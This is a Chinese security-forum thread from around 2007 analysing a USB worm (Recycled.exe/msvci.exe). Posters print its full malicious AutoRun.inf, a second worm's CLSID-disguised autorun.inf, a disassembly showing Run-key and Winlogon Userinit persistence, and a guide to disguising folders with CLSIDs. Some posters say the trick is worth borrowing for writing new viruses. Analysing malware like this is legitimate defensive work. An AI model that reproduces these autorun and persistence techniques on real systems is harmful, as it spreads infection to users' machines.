[讨论]Recycled病毒传播方式 Recycled, 病毒传播, 讨论

虚竹

[讨论]Recycled病毒传播方式
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
议题作者：fhod


帮朋友电脑杀毒时..插上自己的移动硬盘找工具...回家后把移动硬盘插上打开一个盘后发现自己进程里多了个
Recycled.exe和msvci.exe才意识到自己中毒了..肯定是移动盘带来的..可我检查了下..并不像以前U盘传播的病毒那样右击盘符的话会出现auto而且直接双击是打不开那个盘的..

偶对这个U盘病毒的传播方式感了兴趣
在DOS下dir/a看了下多了三个文件
AutoRun.inf
msvci.exe
Recycled.exe

用了一些方法把这三个文件提取出来..问题一定出在AutoRun.inf上

打开看了下跟AutoRun.inf的病毒是有区别的

这个病毒AutoRun.inf文件内容如下

[autorun]
OPEN=Recycled.exe
shell\open=打开(&O)
shell\open\Command=Recycled.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=Recycled.exe


怪不得呢..我被这个打开欺骗了..无论是右击打开..还是资源管理器都是运行了Recycled.exe

但是他又是怎么在运行Recycled.exe后又打开那个目标盘的呢

我想很有可能是Recycled.exe里某段代码..在运行成功Recycled.exe后又打开目标盘的...但我不会反汇编也没有具体分析..特把病毒体上传..对此病毒有意思的可以分析下..

别的不说..就是他那个AutoRun.inf值得引荐的..以后写传播的病毒可以借用.
附件
Recycled.rar (53 KB)
2007-4-21 16:28, 下载次数: 63

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-24 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

poc
晶莹剔透§烈日灼然

一切都好说

将U盘 NTFS的系统比较好
帖子31 精华0 积分90 阅读权限40 性别男 在线时间57 小时 注册时间2007-3-18 最后登录2008-7-17 查看详细资料TOP 您知道您年薪应是多少?

d.w.g.o.o
晶莹剔透§烈日灼然

kklau

这个AutoRun.inf 貌似见过
[autorun]
OPEN=exe
shell\open=打开(&O)
shell\open\Command=exe
这段就见多了。。

我们学校U盘病毒是非常多种多样滴!有很多是瞒有突破性的!

帖子12 精华0 积分39 阅读权限40 在线时间31 小时 注册时间2007-1-1 最后登录2008-6-29 查看详细资料TOP 让女孩一夜变的更有女人味

hitlerboy
晶莹剔透§烈日灼然

pandio

这个似乎在上期黑防上见到，作者似乎没有说，还需要在*.exe里加东西。
好像只要这么一个autorun.inf，就会先打开病毒文件，再打开u盘~
等等测试一下。
帖子79 精华0 积分274 阅读权限40 性别男 在线时间182 小时 注册时间2006-5-7 最后登录2008-4-11 查看详细资料TOP

sudami
大米米

运维管理组

阳光型男

呵呵,这个autorun.inf比较有意思,竟然连"资源管理器"也不放过,我同学把U盘拿过来时也中毒了,
这个病毒也比较有意思,以下是分析过程,可以类比着找到它们的共同之处:

【分享】一次U盘病毒问题分析
今天把同学的U盘拿过来,习惯性的点右键,果然有病毒:

最后微点也报病毒了,为了便于研究,便把微点关了!
最近的U盘病毒用右键打开,即使是点"资源管理器"也可能会中标,所以我用文件夹浏览打开的.
显示隐藏文件后,理所当然的发现了autorun.inf文件:

复制内容到剪贴板
代码:
[AutoRun]
Shell = verb1
shell\verb1\command=Thumbs.dn\1.{3aea-1069-a2de-08002b30309d}\Thumbs.bat
shell\verb1=打开(&O)
Shell = Auto
找到其中的Thumbs.dn,发现是一个打印机图表,点开看也是打印机的东西:

于是想起来了WINDOWS的"CLSID",原来这个小病毒用了障眼法.
先提供些资料:
引用:
就象是每个公民都有一个唯一的身份证和身份证号码一样，在Windows中，每个系统级应用程序(比如“我的电脑”、“回收站”、“计划任务”等)也都用一个唯一的标识符来进行管理，当我们操作电脑双击某个文件夹时(比如双击“计划任务”)，操作系统会首先检查该文件夹的文件名，并到注册表中去这个标识符所注册的应用程序类型，最后再打开相应的应用程序或使用这个应用程序打开该文件(这就是为什么我们双击“我的电脑”或“计划任务”时，弹出的窗口永远和普通文件夹窗口不一样的道理)，那么在操作系统与真实文件夹之间起到承接作用的这些数字就被称为“类标识符”。
　　其实这个“类标识符”的真正名字叫“Windows文件标识符”，英文名称“CLSID”，平时被保存在注册表中[HKEY_LOCAL_MACHINE\Software\Classes\CLSID]键值下，通常是由32个十六进制数构成，其一般格式就是“.{八位数-四位数-四位数-四位数-十二位数}”(注意在大括号前面有一个“点”)。
其实Windows的“类标识符”并不仅仅表示像“我的电脑”这样的系统级应用程序，许多注册过的文件后缀也都拥有自己的“类标识符”，比如“.{00020c01-0000-0000-c000-000000000046}”代表的就是WAV音频文件，而“.{00020811-0000-0000-c000-000000000046}则是代表Excel的图表文件。不过这里有一点是确定的，所有的“类标识符”在一个Windows中都是唯一的
于是我先到cmd下dir /a 或者 dir /x 把它完全显示出来,

结果这个Thumbs.dn文件竟然没有把它后面的
.{2227A280-3AEA-1069-A2DE-08002B30309D}
显示出来.
打印机的CLSID就是.{2227A280-3AEA-1069-A2DE-08002B30309D}
用[p]ren Thumbs.dn.{2227A280-3AEA-1069-A2DE-08002B30309D} 1

也不管用...
看来得用WINARA 了,
打开它才把 Thumbs.dn里面的东西揪出来:

晕了,不知道这个隐藏的扩展名在CMD下也不会显示~
大牛来解释下啊~
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
病毒打包传上来(发现传不了附件...)，供有兴趣的研究:
Ｕ盘病毒Thumbs.dnWINDOWS内核疯狂爱好者
帖子243 精华6 积分5537 阅读权限150 性别男 在线时间1115 小时 注册时间2007-1-10 最后登录2008-7-24 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

ring04h
团队执行官

li85

查找相应值.
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\
HKEY_CLASSES_ROOT\CLSID\


转贴:
  Windows文件类标识符及其应用
      
  1、文件类标识符        
  Windows系统中的文件类标识符是确定文件类型与打开该文件的程序的唯一标识代码。通俗讲，文件类标识符就是文件类型的身份证，它不仅能区分文件的基本类型，还能建立文件与应用程序的关联。简言之，Windows文件类标识符是区分文件类型的根本，也是Windows建立文件与程序关联的标志。从应用层次上讲，我们知道Windows中的文件类型可以通过文件的扩展名和文件的图标来区分，不过这种区分只是形式上的，在文件类型的区分上文件类标识符是从Windows系统内部给出的唯一本质区别，保留文件的扩展名而修改了文件的类标识符必然导致文件类型变更。Windows中每一种已注册的文件对象（文件、文件夹、系统图标和控件）都使用了专门的文件类标识符，通过文件类标识符Windows能正确识别文件类型与操作该类文件的应用程序，并建立起二者的关联关系。
  Windows中的文件类标识符的组成基本格式是：
  {八位十六进制数-四位十六进制数-四位十六进制数-四位十六进制数-十二位十六进制数}。
  即花括号内五组用“-”分隔的十六进制数组成。        
  如AVI文件的类标识符为{00022602-0000-0000-C000-000000000046}，注意必须是英文半角字符，字母大小写等效。
  2、Windows中常用的文件类标识符
        （1）、系统文件夹的文件类标识符
        Windows中的常用系统文件夹的类标识符有：
        我的电脑 {20D04FE0-3AEA-1069-A2D8-08002B30309D}
        我的文档 {450D8FBA-AD25-11D0-98A8-0800361B1103}
        拨号网络 {992CFFA0-F557-101A-88EC-00DD010CCC48}
        控制面板 {21EC2020-3AEA-1069-A2DD-08002B30309D}
        计划任务 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
        打印机 {2227A280-3AEA-1069-A2DE-08002B30309D}
        网上邻居 {208D2C60-3AEA-1069-A2D7-08002B30309D}
        回收站 {645FF040-5081-101B-9F08-00AA002F954E}
        公文包 {85BBD920-42A0-1069-A2E4-08002B30309D}
        字体 {BD84B380-8CA2-1069-AB1D-08000948F534}
        Web 文件夹 {BDEADF00-C265-11D0-BCED-00A0C90AB50F}
        （2）、常用文件的类标识符
        DOC文件 {00020900-0000-0000-C000-000000000046}
        XLS文件 {00020810-0000-0000-C000-000000000046}
        PPT文件 {64818D10-4F9B-11CF-86EA-00AA00B929E8}
        HTML文件 {25336920-03F9-11cf-8FD0-00AA00686F13}
        AVI文件 {00022602-0000-0000-C000-000000000046}
        3、文件对象类标识符的简单应用
        （1）、新建Windows系统图标
        
      Windows系统图标有：我的电脑、网上邻居、回收站、我的文档、公文包等。采用Windows文件类标识符自建这类图标的方法是：在桌面或者指定盘的指定文件夹中新建一个文件夹并将文件夹名取为相应系统图标名，然后用英文句点分隔连接文件类标识符即可。如自建“我的电脑”图标时，将新建的文件夹名使用成“我的电脑.
      {20D04FE0-3AEA-1069-A2D8-08002B30309D}”，Windows系统会自动隐藏其文件类标识符且自动更改文件夹图标为我的电脑图标形成用户自己建立的“我的电脑”图标；不仅如此，进一步其图标之功能也随之成为地道的“我的电脑”的功能。其它系统图标可以类似新建，建立完成后其图标的功能也将发生转变——变成与系统本身图标功能一样的图标。总之，通过建立系统图标我们可以实现在计算机桌面上拥有两个“我的电脑”、两个“网上邻居”、两个“回收站”等等。
        （2）、修改文件类型
        
      Windows中的文件类型是由创建文件的应用程序及其兼容关系确定的，一般由文件扩展名和文件图标简单显示，但文件类型的本质区别还在于文件的类标识符。不管是文件还是文件夹只要修改了它的文件类标识符必然导致文件类型与关联程序的改变，它有利于对重要文件、文件夹进行保护。
        对文件夹修改文件类标识符，只要对其重命名并带上相应文件的文件类标识符即可，如改文件夹“ABC”的名字为“ABC.
      {00022602-0000-0000-C000-000000000046}”，则文件夹图标会变成AVI文件的图标，且双击它可以启动Windows多媒体播放器来打开文件并显示错误而不会打开文件夹。
        
      对文件修改文件类型标识符完成易容处理必须注意：①、当前Windows系统的文件类型扩展名是否显示，即“文件夹选项”设置中的“查看”标签下的“隐藏已知文件类型的扩展名”是否钩选，钩选此项为隐藏已知文件类型扩展名，否则就是显示已知文件类型的扩展名。②、文件扩展名只是形式上的文件类型区分标志，有文件扩展名或无文件扩展名，只要修改了文件的类型标识符即彻底改变了文件的类型和关联程序。
        
      如：我们将WORD文档“WW.DOC”带文件类标识符改名为“WW.DOC.{25336920-03F9-11cf-8FD0-00AA00686F13}”，则尽管它还带有DOC扩展名，但它已成为网页类型文件了（HTML文件）。
        把Excel工作簿文件AA.XLS改名为“AA.XLS.
      {00022602-0000-0000-C000-000000000046}”，则工作簿文件会变成AVI文件。
        （3）、隐藏文件夹
        
      对存有大量重要文件的文件夹，经过带系统图标文件类标识符的改名操作后可以达到隐藏文件夹的目的，因为一旦文件夹带系统图标文件类标识符改名后其图标功能就随之变成为对应的系统图标功能了，这样用鼠标双该图标启动的是系统文件夹工具，而不能打开文件夹。如将文件夹SUB改名为“SUB.
      {208D2C60-3AEA-1069-A2D7-08002B30309D}”，虽然它的名字没有变但类型变成了“网上邻居”的功能了。
        对文件夹采用带常用文件类标识符改名也能实现文件夹隐藏和保护功能，同样双击已不能打开文件夹，只是启动相应类型文件的关联应用程序。
        （4）、新建“控制面板”访问系统资源
        
      控制面板的执行程序是CONTROL.EXE，可以通过“开始菜单”——“运行”对话框输入可执行程序启动；不仅如此，我们也还可以用文件类标识符新建控制面板图标来简单启动“控制面板”窗口。方法还是新建文件，任意取定字符名并带上文件类标识符确认即可。
        如新建文件夹UUU改名为“UUU.
      {21EC2020-3AEA-1069-A2DD-08002B30309D}”，系统隐藏文件类标识符并显示控制面板图标，双击名字为UUU的图标即启动控制面板程序进入控制面板窗口。
        （5）、恢复文件、文件夹的易容处理
        
      以上文件类标识符的应用都只是Windows自带的一种易容术，也是系统内部一种文件管理机制。经过易容处理后，如果还想还原并恢复文件、文件夹原貌，可以采用以下方法实现：
        ①、用DOS命令进行文件改名还原
        
      Windows中的文件类标识符正确应用后始终都处于隐藏状态，但进入MS-DOS方式或命令提示符后进行文件、文件夹浏览，则文件名或文件夹名后都带有文件类标识符；因此，在DOS状态下进行文件、文件夹改名即可将带有文件类标识符的文件、文件夹名去掉其文件类标识符部份并保持文件正确的原有扩展名后恢复原文件、文件夹。可用于文件、文件夹改名的DOS命令有COPY、XCOPY、RENAME、MOVE，所以使用它们都可以完成易容文件、文件夹恢复。命令格式如下：
        命令名 带文件类标识符的文件或文件夹名 新文件或文件夹名
        例如：RENAME AA.XLS. {00022602-0000-0000-C000-000000000046} AA.XLS。
        ②、用WINRAR工具软件恢复
        启动WINRAR进入易容文件、文件夹所在文件夹，选定易容文件或文件夹，单击进行改名并去掉文件类标识符即可
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1096 小时 注册时间2007-10-23 最后登录2008-7-24 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

wolfluxay
晶莹剔透§烈日灼然

都市狂飚

在我电脑上的文件夹名字是 文件名+clsid 这么长长的一段，你的贴图上怎么没有显示

帖子52 精华0 积分166 阅读权限40 性别男 在线时间219 小时 注册时间2006-2-2 最后登录2008-7-17 查看详细资料TOP 让女孩一夜变的更有女人味

hitlerboy
晶莹剔透§烈日灼然

乡下佬

五楼的文章受教了～
想问个问题，如果，我在文件夹里藏了个文件，然后用clsid易容之后，
还能访问那个文件么？
帖子79 精华0 积分274 阅读权限40 性别男 在线时间182 小时 注册时间2006-5-7 最后登录2008-4-11 查看详细资料TOP

peter_yu
荣誉会员

我为车狂

看似是VB写的，可我直接解却解不出什么东西来

00401080 > . 5A603973   DD msvbvm60.__vbaChkstk         ; ASCII "QWP="
00408674  48864000   DD 1.00408648              ; ASCII "user32"
00408678  54864000   DD 1.00408654              ; ASCII "FindWindowA"
004086BC  48864000   DD 1.00408648              ; ASCII "user32"
004086C0  AC864000   DD 1.004086AC              ; ASCII "PostMessageA"
00408914  30884000   DD 1.00408830              ; ASCII "advapi32.dll"
00408918  04894000   DD 1.00408904              ; ASCII "RegSetValueExA"
00408E58  48864000   DD 1.00408648              ; ASCII "user32"
00408E5C  488E4000   DD 1.00408E48              ; ASCII "CallWindowProcA"
00408EA0  F4864000   DD 1.004086F4              ; ASCII "kernel32"
00408EA4  908E4000   DD 1.00408E90              ; ASCII "RtlMoveMemory"
00409A76 . BA 148B4000  MOV EDX,1.00408B14           ; UNICODE "YB_OnlineClient"
00409BA6 . BA 548D4000  MOV EDX,1.00408D54           ; UNICODE "QQGame"
00409BCC . BA 788D4000  MOV EDX,1.00408D78           ; UNICODE "NS-SHAFT"
00409D9A . C745 A4 E48D40>MOV DWORD PTR SS:[EBP-5C],1.00408DE4  ; UNICODE "msvci.exe"
0040A101 . C785 DCFEFFFF >MOV DWORD PTR SS:[EBP-124],1.00408DFC  ; UNICODE "\explorer.exe"
0040A958 . C785 ECFEFFFF >MOV DWORD PTR SS:[EBP-114],1.00408F00  ; UNICODE "Recycled.exe"
0040AAFA . 68 408F4000  PUSH 1.00408F40             ; UNICODE "D:\"
0040AC68 . 68 708F4000  PUSH 1.00408F70             ; UNICODE "sval"
0040AC6D . 68 648F4000  PUSH 1.00408F64             ; UNICODE "st"
0040AC72 . 68 4C8F4000  PUSH 1.00408F4C             ; UNICODE "sgstudent"
0040AF82 . BF 908F4000  MOV EDI,1.00408F90           ; UNICODE "Software\Microsoft\Windows\CurrentVersion\Run"
0040B011 . BA F08F4000  MOV EDX,1.00408FF0           ; UNICODE "userinit.exe,Recycled.exe"
0040B016 . 8D4D DC    LEA ECX,DWORD PTR SS:[EBP-24]
0040B019 . E8 3067FFFF  CALL <JMP.&msvbvm60.__vbaStrCopy>
0040B01E . BA 98904000  MOV EDX,1.00409098           ; UNICODE "Userinit"
0040B023 . 8D4D CC    LEA ECX,DWORD PTR SS:[EBP-34]
0040B026 . E8 2367FFFF  CALL <JMP.&msvbvm60.__vbaStrCopy>
0040B02B . BA 28904000  MOV EDX,1.00409028           ; UNICODE "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040B395 . 68 C0904000  PUSH 1.004090C0             ; UNICODE "Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL"
0040B3DA . 68 68914000  PUSH 1.00409168             ; UNICODE "CheckedValue"
0040B66B . BF 98914000  MOV EDI,1.00409198           ; UNICODE "AutoRun.inf"

0040C674 |. 68 44944000  PUSH 1.00409444             ; UNICODE "[autorun]"
0040C679 |. 57      PUSH EDI
0040C67A |. BE 5C944000  MOV ESI,1.0040945C
0040C67F |. 56      PUSH ESI
0040C680 |. E8 2351FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C685 |. 68 64944000  PUSH 1.00409464             ; UNICODE "OPEN=Recycled.exe"
0040C68A |. 57      PUSH EDI
0040C68B |. 56      PUSH ESI
0040C68C |. E8 1751FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C691 |. 68 8C944000  PUSH 1.0040948C             ; UNICODE "shell\open="
0040C696 |. 57      PUSH EDI
0040C697 |. 56      PUSH ESI
0040C698 |. E8 0B51FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C69D |. 68 B4944000  PUSH 1.004094B4             ; UNICODE "shell\open\Command=Recycled.exe"
0040C6A2 |. 57      PUSH EDI
0040C6A3 |. 56      PUSH ESI
0040C6A4 |. E8 FF50FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C6A9 |. 68 F8944000  PUSH 1.004094F8             ; UNICODE "shell\open\Default=1"
0040C6AE |. 57      PUSH EDI
0040C6AF |. 56      PUSH ESI
0040C6B0 |. E8 F350FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C6B5 |. 68 28954000  PUSH 1.00409528             ; UNICODE "shell\explore="
0040C6BA |. 57      PUSH EDI
0040C6BB |. 56      PUSH ESI
0040C6BC |. E8 E750FFFF  CALL <JMP.&msvbvm60.__vbaPrintFile>
0040C6C1 |. 83C4 48    ADD ESP,48
0040C6C4 |. 68 5C954000  PUSH 1.0040955C             ; UNICODE "shell\explore\Command=Recycled.exe"
帖子53 精华4 积分3207 阅读权限100 性别男 来自crsky 在线时间99 小时 注册时间2006-2-26 最后登录2008-6-26 查看详细资料TOP

peter_yu
荣誉会员

喂食猫

那两个exe应该是一样的
UNICODE "shell\explore\Command=Recycled.exe"
UNICODE "shell\explore="
UNICODE "shell\open\Default=1"
UNICODE "shell\open\Command=Recycled.exe"
UNICODE "shell\open="
NICODE "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040B395
帖子53 精华4 积分3207 阅读权限100 性别男 来自crsky 在线时间99 小时 注册时间2006-2-26 最后登录2008-6-26 查看详细资料TOP

hitlerboy
晶莹剔透§烈日灼然

风的方向

昨晚测试，发现我的系统跟版主讲的有点不一样，我的文件夹名字，加了特定标识符以后，
图标，功能是变了，但是，标识符，不隐藏，可以看得到。
还有8楼我自己的问题，解决了，可以访问的到。
帖子79 精华0 积分274 阅读权限40 性别男 在线时间182 小时 注册时间2006-5-7 最后登录2008-4-11 查看详细资料TOP

dayang1718
晶莹剔透§烈日灼然

天下无敌

我在我自己的电脑里创建了这么个文件和程序（把AUTORUN.INF文件里的文件名给为指定程序的文件名),放到d盘的根目录下，双击盘副，也没运行，ntfs文件系统，自动播放功能也开的，不知道什么会无法运行了呢love hack
帖子80 精华0 积分271 阅读权限40 性别男 来自shandong 在线时间87 小时 注册时间2006-10-7 最后登录2008-7-14 查看详细资料TOP

4nge.7b
晶莹剔透§烈日灼然

zqm

它的打开是从另一窗口打开,简单用ShellExecute函数以最大化模式也可以实现这功能...
AutoRun.inf的代码有不少值得借鉴的方法... 请把牛B还给牛!
帖子12 精华0 积分45 阅读权限40 在线时间11 小时 注册时间2007-5-31 最后登录2007-9-7 查看详细资料TOP

heekey
晶莹剔透§烈日灼然

天下无敌

这的确是个病毒隐藏传播的方法！不注意的话还不容易发现！！要是能才用线程插入的方式我感觉这样的方法会更有前景啊！
帖子18 精华0 积分54 阅读权限40 在线时间8 小时 注册时间2007-3-12 最后登录2008-7-12 查看详细资料TOP

狂封异袭
晶莹剔透§烈日灼然